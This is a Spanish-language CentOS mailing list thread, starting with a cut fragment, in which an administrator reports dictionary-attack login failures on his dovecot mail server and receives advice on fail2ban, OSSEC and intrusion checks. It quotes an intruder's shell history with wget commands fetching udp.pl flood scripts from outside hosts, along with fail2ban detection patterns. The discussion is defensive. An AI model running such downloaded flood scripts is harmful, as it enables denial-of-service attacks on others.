mientras escribía es este http://201.77.5.191/ de Brazil)General IP InformationIP:183.60.20.40Decimal:3074167848Hostname:183.60.20.40ISP:ChinaNet Guangdong Province NetworkOrganization:ChinaNet Guangdong Province NetworkServices:None detectedType:BroadbandAssignment:Static IPBlacklist:Geolocation InformationCountry:China State/Region:GuangdongCity:GuangzhouLatitude:23.1167 (23° 7′ 0.12″ N)Longitude:113.25 (113° 15′ 0.00″ E) Por recomendación de los ya mencionados amigos instale el fail2ban pero creo que no hace nada o bien algo estoy haciendo mal ,posteo configuracion:Jail.conf[dovecot-pop3imap]enabled = truefilter = dovecot-pop3imapaction = iptables-multiport[name=dovecot-pop3imap, port=pop3,pop3s,imap,imaps, protocol=tcp] sendmail-whois[name=dovecot-pop3imap, dest=root, sender=u...@xxx.xxx]logpath = /var/log/maillogmaxretry = 2#findtime = 600bantime = 5200 En la carpeta filter.d/dovecot-pop3imap.conf tengo esto:[Definition]failregex = dovecot: auth-worker\(default\): sql\(.*,HOST\): unknown user dovecot: (pop3|imap)-login: Aborted login \(.*\): .*, \[HOST\] dovecot: (pop3|imap)-login: Disconnected \(auth failed, .*\): .*, \[HOST\] dovecot: auth\(default\): passdb\(.*,HOST\)\: Attempted login with password having illegal charsdovecot: (pop3|imap)-login: Disconnected \(auth failed, .*\): .*, \[HOST\]dovecot: (pop3|imap)-login: Aborted login: .*, \[HOST\]ignoreregex = La cosa que los escaneos que me hacen al dovecot el fail2ban no tiene idea
Re: [CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot
Hola, Le 21/03/2013 16:55, Luis Alberto Roman Aguirre a écrit : Buenos días a todos de la lista: Primero que nada les cuento la experiencia que estoy pasando con mi servidor de correos (postfix,dovecot+sasl), hace un mes aproximadamente he notado que el servidor a las 5:00PM es atacado/escaneado o algo asi tratando de conectarse al dovecot especificamente ,les posteo lo que sale...- pam_unix Begin dovecot: Authentication Failures: contacto rhost=66.142.38.137 : 88 Time(s) [...] turismo rhost=66.142.38.137 : 57 Time(s).. . (hay mas resgisto q no lo pongo es bastante todos salen de la misma ip)Unknown Entries: check pass; user unknown: 3901 Time(s) Al parecer es un diccionario que prueba esos usuarios para ingresar al dovecot o bien al postfix.esto ya me pasa desde ya hace un mes y no puedo detectar como y donde se ejecuta, pero si averigue que hicieron y que se bajaron para realizar esto. el cual detallo, yo uso un Centos 6.0 64 bits, fue un usuario interno con conocimiento basicos de linux ( al menos eso creo ) se conecto y hizo eso, (lo saque del history)wget http://y2khom3.evonet.ro/udp.plwget www.buble.biz/alinftp/udp.plwget www.packetstormsecurity.org/DoS/udp.plping www.google.com.peps xcd /tmpls -awpasswd mcondeexit El detalle es que desde ese momento ya tengo el problema que les comente lineas arriba.. a alguien de ustedes la ha pasado de casualidad lo mismo? espero me puedan alguna señal de como detectar de donde se ejecuta dicho escaneo .si esta en mi server y siempre se ejecuta a esa hora?? o es un scaneo externo. Saludos Luis Roman Como te ha respondido José Fernández los logs muestran intentos de conexión desde la IP 66.142.38.137. Parece ser que se trata de una ADSL de un proveedor de Internet del suroeste de los EEUU, SouthWestern Bell, que a su vez parece ser propiedad de ATT: adsl-66-142-38-137.dsl.kscymo.swbell.net Si siempre es esta IP la que trata de acceder a tu servidor contacta con ellos, tienen una cuenta de correo para estos casos. Escríbeles a ab...@swbell.net y explícales el problema. Deberían poner remedio. http://public.swbell.net/contact.html Saludos. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot
Configurate un servicio OSSEC es un detector de intrusos basado en host y rootkit El 22/03/2013 02:32, Francesc Guitart francesc.guit...@enise.fr escribió: Hola, Le 21/03/2013 16:55, Luis Alberto Roman Aguirre a écrit : Buenos días a todos de la lista: Primero que nada les cuento la experiencia que estoy pasando con mi servidor de correos (postfix,dovecot+sasl), hace un mes aproximadamente he notado que el servidor a las 5:00PM es atacado/escaneado o algo asi tratando de conectarse al dovecot especificamente ,les posteo lo que sale...- pam_unix Begin dovecot: Authentication Failures: contacto rhost=66.142.38.137 : 88 Time(s) [...] turismo rhost=66.142.38.137 : 57 Time(s).. .(hay mas resgisto q no lo pongo es bastante todos salen de la misma ip)Unknown Entries: check pass; user unknown: 3901 Time(s) Al parecer es un diccionario que prueba esos usuarios para ingresar al dovecot o bien al postfix.esto ya me pasa desde ya hace un mes y no puedo detectar como y donde se ejecuta, pero si averigue que hicieron y que se bajaron para realizar esto. el cual detallo, yo uso un Centos 6.0 64 bits, fue un usuario interno con conocimiento basicos de linux ( al menos eso creo ) se conecto y hizo eso, (lo saque del history)wget http://y2khom3.evonet.ro/udp.plwget www.buble.biz/alinftp/udp.plwget www.packetstormsecurity.org/DoS/udp.plping www.google.com.peps xcd /tmpls -awpasswd mcondeexit El detalle es que desde ese momento ya tengo el problema que les comente lineas arriba.. a alguien de ustedes la ha pasado de casualidad lo mismo? espero me puedan alguna señal de como detectar de donde se ejecuta dicho escaneo .si esta en mi server y siempre se ejecuta a esa hora?? o es un scaneo externo. Saludos Luis Roman Como te ha respondido José Fernández los logs muestran intentos de conexión desde la IP 66.142.38.137. Parece ser que se trata de una ADSL de un proveedor de Internet del suroeste de los EEUU, SouthWestern Bell, que a su vez parece ser propiedad de ATT: adsl-66-142-38-137.dsl.kscymo.swbell.net Si siempre es esta IP la que trata de acceder a tu servidor contacta con ellos, tienen una cuenta de correo para estos casos. Escríbeles a ab...@swbell.net y explícales el problema. Deberían poner remedio. http://public.swbell.net/contact.html Saludos. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
[CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot
Buenos días a todos de la lista: Primero que nada les cuento la experiencia que estoy pasando con mi servidor de correos (postfix,dovecot+sasl), hace un mes aproximadamente he notado que el servidor a las 5:00PM es atacado/escaneado o algo asi tratando de conectarse al dovecot especificamente ,les posteo lo que sale...- pam_unix Begin dovecot: Authentication Failures: contacto rhost=66.142.38.137 : 88 Time(s) teste rhost=66.142.38.137 : 88 Time(s) basura rhost=66.142.38.137 : 65 Time(s) renata rhost=66.142.38.137 : 65 Time(s) financeiro rhost=66.142.38.137 : 64 Time(s) biblioteca rhost=66.142.38.137 : 62 Time(s) bodega rhost=66.142.38.137 : 62 Time(s) licita rhost=66.142.38.137 : 62 Time(s) clientes rhost=66.142.38.137 : 61 Time(s) contabilidad rhost=66.142.38.137 : 59 Time(s) estudio rhost=66.142.38.137 : 59 Time(s) mrivera rhost=66.142.38.137 : 58 Time(s) patricio rhost=66.142.38.137 : 58 Time(s) prueba rhost=66.142.38.137 : 58 Time(s) usuario rhost=66.142.38.137 : 58 Time(s) turismo rhost=66.142.38.137 : 57 Time(s).. . (hay mas resgisto q no lo pongo es bastante todos salen de la misma ip)Unknown Entries: check pass; user unknown: 3901 Time(s) Al parecer es un diccionario que prueba esos usuarios para ingresar al dovecot o bien al postfix.esto ya me pasa desde ya hace un mes y no puedo detectar como y donde se ejecuta, pero si averigue que hicieron y que se bajaron para realizar esto. el cual detallo, yo uso un Centos 6.0 64 bits, fue un usuario interno con conocimiento basicos de linux ( al menos eso creo ) se conecto y hizo eso, (lo saque del history)wget http://y2khom3.evonet.ro/udp.plwget www.buble.biz/alinftp/udp.plwget www.packetstormsecurity.org/DoS/udp.plping www.google.com.peps xcd /tmpls -awpasswd mcondeexit El detalle es que desde ese momento ya tengo el problema que les comente lineas arriba.. a alguien de ustedes la ha pasado de casualidad lo mismo? espero me puedan alguna señal de como detectar de donde se ejecuta dicho escaneo .si esta en mi server y siempre se ejecuta a esa hora?? o es un scaneo externo. Saludos Luis Roman ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot
Buenas Noches. Lo que indican los logs son fallos de autenticación que provienen de una dirección remota. rhost=66.142.38.137 Para resolver esto puede instalar un paquete como fail2ban y configurarlo para que chequee los logs de dovecot y cualquier otro servicio que quieras proteger. Fail2ban verifica 3 intentos fallidos de login desde una misma ip y posteriormente procede a bloquearla por un lapso de tiempo. En cuanto al historial de comandos que mencionas deberias de verificar si fue una intrusión a tu servidor y que efecto tuvo en el mismo. si no han eliminado los registro del servidor estos comandos pueden ayudarte a saber que usuario logro entrar. last lastlog Puedes indagar más sobre que hace el código que se descargo el intruso y si tuvo algun efecto en tu servidor. generalmente estos se usan para escalar privilegios en el servidor y como rootkit. Existen herramientas como rootkithuter que te permiten detectar software malicioso en el servidor. Saludos. From: luisroma...@hotmail.com To: centos-es@centos.org Date: Thu, 21 Mar 2013 15:55:31 + Subject: [CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot Buenos días a todos de la lista: Primero que nada les cuento la experiencia que estoy pasando con mi servidor de correos (postfix,dovecot+sasl), hace un mes aproximadamente he notado que el servidor a las 5:00PM es atacado/escaneado o algo asi tratando de conectarse al dovecot especificamente ,les posteo lo que sale...- pam_unix Begin dovecot: Authentication Failures: contacto rhost=66.142.38.137 : 88 Time(s) teste rhost=66.142.38.137 : 88 Time(s) basura rhost=66.142.38.137 : 65 Time(s) renata rhost=66.142.38.137 : 65 Time(s) financeiro rhost=66.142.38.137 : 64 Time(s) biblioteca rhost=66.142.38.137 : 62 Time(s) bodega rhost=66.142.38.137 : 62 Time(s) licita rhost=66.142.38.137 : 62 Time(s) clientes rhost=66.142.38.137 : 61 Time(s) contabilidad rhost=66.142.38.137 : 59 Time(s) estudio rhost=66.142.38.137 : 59 Time(s) mrivera rhost=66.142.38.137 : 58 Time(s) patricio rhost=66.142.38.137 : 58 Time(s) prueba rhost=66.142.38.137 : 58 Time(s) usuario rhost=66.142.38.137 : 58 Time(s) turismo rhost=66.142.38.137 : 57 Time(s).. . (hay mas resgisto q no lo pongo es bastante todos salen de la misma ip)Unknown Entries: check pass; user unknown: 3901 Time(s) Al parecer es un diccionario que prueba esos usuarios para ingresar al dovecot o bien al postfix.esto ya me pasa desde ya hace un mes y no puedo detectar como y donde se ejecuta, pero si averigue que hicieron y que se bajaron para realizar esto. el cual detallo, yo uso un Centos 6.0 64 bits, fue un usuario interno con conocimiento basicos de linux ( al menos eso creo ) se conecto y hizo eso, (lo saque del history)wget http://y2khom3.evonet.ro/udp.plwget www.buble.biz/alinftp/udp.plwget www.packetstormsecurity.org/DoS/udp.plping www.google.com.peps xcd /tmpls -awpasswd mcondeexit El detalle es que desde ese momento ya tengo el problema que les comente lineas arriba.. a alguien de ustedes la ha pasado de casualidad lo mismo? espero me puedan alguna señal de como detectar de donde se ejecuta dicho escaneo .si esta en mi server y siempre se ejecuta a esa hora?? o es un scaneo externo. Saludos Luis Roman ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es